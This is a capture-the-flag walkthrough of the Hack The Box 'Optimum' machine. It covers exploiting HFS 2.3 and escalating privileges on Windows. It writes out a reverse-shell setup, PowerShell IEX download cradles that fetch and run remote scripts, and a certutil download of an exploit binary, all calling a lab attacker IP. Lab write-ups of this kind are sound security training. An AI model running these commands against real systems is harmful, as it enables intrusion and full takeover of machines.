Note: In an attempt to be OSCP friendly, NONE of my write ups will utilize Metasploit. Zero. Zip. Tell your friends.
Nmap
As always, we start with our standard Nmap scan: nmap -A -p- 10.10.10.8 (-p- covers all 65535 TCP ports; -A adds version detection, OS detection, the default scripts and a traceroute).

Not much is open other than port 80, which appears to be running HttpFileServer 2.3 (Rejetto HFS). Let's kick off a gobuster scan before we bring up the browser and look at the site: gobuster dir -u http://10.10.10.8 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Now, let’s open up our browser and check out the site: http://10.10.10.8

Not a whole lot to work with here, so let's see what Google turns up for HttpFileServer 2.3.
Vulnerability Discovery

The first link is a Remote Code Execution (RCE) exploit for HFS 2.3.x: https://www.exploit-db.com/exploits/39161
Download it, rename it and make it executable: wget https://www.exploit-db.com/raw/39161 -O 39161.py && chmod +x 39161.py

Open the script in your editor of choice. A few things stand out about how it operates:

I changed the ip_addr and local_port variables to my Kali box's IP and the port I'll be listening on with netcat.

We also need nc.exe in our working directory and a Python HTTP server serving it on port 80, because the script makes the target download nc.exe from http://<ip_addr>:80/nc.exe (this is noted in the exploit's own header): python3 -m http.server 80

Start a netcat listener on the port you set in local_port:

Then run the script (it is Python 2 code, it imports urllib2): python 39161.py 10.10.10.8 80 and check your listener. Per the note in the exploit header, it sometimes takes more than one run to land a shell.


And the user.txt flag is in the directory we’re already in.
Priv Esc – Windows Exploit Suggester
We'll start with Windows Exploit Suggester. If you don't have it yet, clone it, then pull down the current Microsoft security bulletin spreadsheet with: python windows-exploit-suggester.py --update

Next, run systeminfo on the target, copy its output and save it to a file named systeminfo on our Kali box.


Now we'll have Windows Exploit Suggester compare the bulletin database against our systeminfo file: ../Security_Repos/Windows-Exploit-Suggester/windows-exploit-suggester.py --database ../Security_Repos/Windows-Exploit-Suggester/2020-09-22-mssb.xls --systeminfo systeminfo
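Windows Exploit Suggester only cares about a few fields in that file. The following added example (my own code, not WES's) parses those fields out of a constructed systeminfo sample, flags bulletins whose fixing KBs are all absent (the comparison WES makes against its spreadsheet), and makes the x64 check that later decides whether a 32-bit shell has to launch PowerShell via sysnative. The host values, KB numbers and the bulletin map are all made up for the example; they are not Optimum's data and not real bulletin mappings.

```python
#!/usr/bin/env python3
"""What Windows Exploit Suggester reads out of a saved `systeminfo` dump.

Added example, not WES's code. The sample text and the bulletin -> KB map are
constructed placeholders, not real host or Microsoft bulletin data.
"""
import re
from typing import Dict, List, Set

# constructed sample of `systeminfo` output, trimmed to the lines that matter
SAMPLE_SYSTEMINFO = """\
Host Name:                 CONSTRUCTED-HOST
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB2919355
                           [02]: KB2919442
                           [03]: KB3000850
"""

# placeholder standing in for the MSSB spreadsheet: bulletin -> KBs that fix it
SAMPLE_BULLETINS: Dict[str, Set[str]] = {
    "BULLETIN-A": {"KB2919355"},               # one of its KBs is installed
    "BULLETIN-B": {"KB1111111", "KB2222222"},  # none installed -> candidate
}


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Pull OS name/version, architecture and the KB list out of systeminfo output."""
    info: Dict[str, object] = {}
    for key in ("OS Name", "OS Version", "System Type"):
        m = re.search(rf"^{re.escape(key)}:\s*(.+?)\s*$", text, re.M)
        info[key] = m.group(1) if m else None
    # KB numbers sit one per line under "Hotfix(s):"; order is irrelevant
    info["hotfixes"] = sorted(set(re.findall(r"\bKB\d{6,7}\b", text)))
    return info


def is_x64(info: Dict[str, object]) -> bool:
    return str(info.get("System Type") or "").lower().startswith("x64")


def powershell_path(info: Dict[str, object]) -> str:
    """PowerShell path to use from a 32-bit shell: on x64 the sysnative alias
    bypasses WOW64 file redirection and reaches the real 64-bit binary."""
    if is_x64(info):
        return r"%SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe"
    return "powershell.exe"


def missing_bulletins(info: Dict[str, object],
                      bulletins: Dict[str, Set[str]]) -> List[str]:
    """Bulletins for which none of the fixing KBs is installed. WES additionally
    filters by OS version/product; that step is omitted here."""
    installed: Set[str] = set(info["hotfixes"])  # type: ignore[arg-type]
    return sorted(name for name, kbs in bulletins.items() if not kbs & installed)


if __name__ == "__main__":
    info = parse_systeminfo(SAMPLE_SYSTEMINFO)
    print(info["OS Name"], "|", info["OS Version"], "|", "x64" if is_x64(info) else "x86")
    print("PowerShell to use from a 32-bit shell:", powershell_path(info))
    print("unpatched candidates:", missing_bulletins(info, SAMPLE_BULLETINS))
```

One practical caveat this makes visible: WES can only flag what the KB list shows, so a hotfix list truncated during copy-paste from the target shell produces false positives, which is one reason the suggestions below still need to be tried one by one.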

There are a few here to go through. Two stand out right away:

Let’s try them one by one.
MS16-135 – didn’t work
Following the link for the first privilege escalation exploit brings us to an Exploit-DB page: https://www.exploit-db.com/exploits/41015/

This exploit is C code, which I haven't worked with much, so let's give it a try. Download it and copy it into the working directory; it's called 41015.c.

Next we need to compile it for Windows. We can use mingw-w64 for that: x86_64-w64-mingw32-gcc 41015.c -o exploit.exe Here's a link on how to compile exploits in Kali.

I got a compile error. A little more Googling turns up a PowerShell equivalent: https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16135.ps1
Pull it down to Kali with wget. This script executes a command of our choosing with elevated privileges, so we need something that gives us a reverse shell when it runs. PowerShell is on this box, so let's use Invoke-PowerShellTcp.ps1 from Nishang.
Download it and append this line to the end of the file so the function fires as soon as the script is loaded: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.20 -Port 1234

Make sure it's in the folder your Python HTTP server is serving from. Next, update Invoke-MS16135.ps1 so that it runs our Invoke-PowerShellTcp.ps1 script: open Invoke-MS16135.ps1 and add this line to the bottom: Invoke-MS16135 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.14.20/Invoke-PowerShellTcp.ps1')"

Now let's execute it. From the Windows shell run: powershell "IEX(new-object net.webclient).downloadstring('http://10.10.14.20/Invoke-MS16135.ps1')"

Hrm... nothing. We're on a 64-bit box, but the shell we got through HFS was spawned by a 32-bit process, so plain powershell resolves to the 32-bit WOW64 copy. Let's try the 64-bit PowerShell through the sysnative alias: %SystemRoot%\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(new-object net.webclient).downloadstring('http://10.10.14.20/Invoke-MS16135.ps1')"

Still nothing. I noticed on my HTTP server tab that it never even tried to download Invoke-PowerShellTcp.ps1, so the exploit itself never got as far as running our command. Let's try another exploit.
MS16-075 – didn’t work
systeminfo and Windows Exploit Suggester say this might be exploitable, but two things stopped me from trying it. First, the Potato family of attacks needs SeImpersonatePrivilege, and whoami /priv shows it isn't enabled for our user on this box:

Second, when I started watching the video on Hot Potato, it said you might have to wait up to 24 hours for it to work, and I don't have that kind of time.
MS16-098
Let's look at the page for this exploit: https://www.exploit-db.com/exploits/41020
This one is also C, but the header comments link to a pre-compiled binary:

So let’s grab the file: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe

Now let's use certutil to pull it over to the Windows machine. From the Windows shell, in a directory we can write to, run: certutil.exe -urlcache -split -f http://10.10.14.20/41020.exe (the file lands in the current directory as 41020.exe).

Then run it:

Done! You can grab the root flag from here.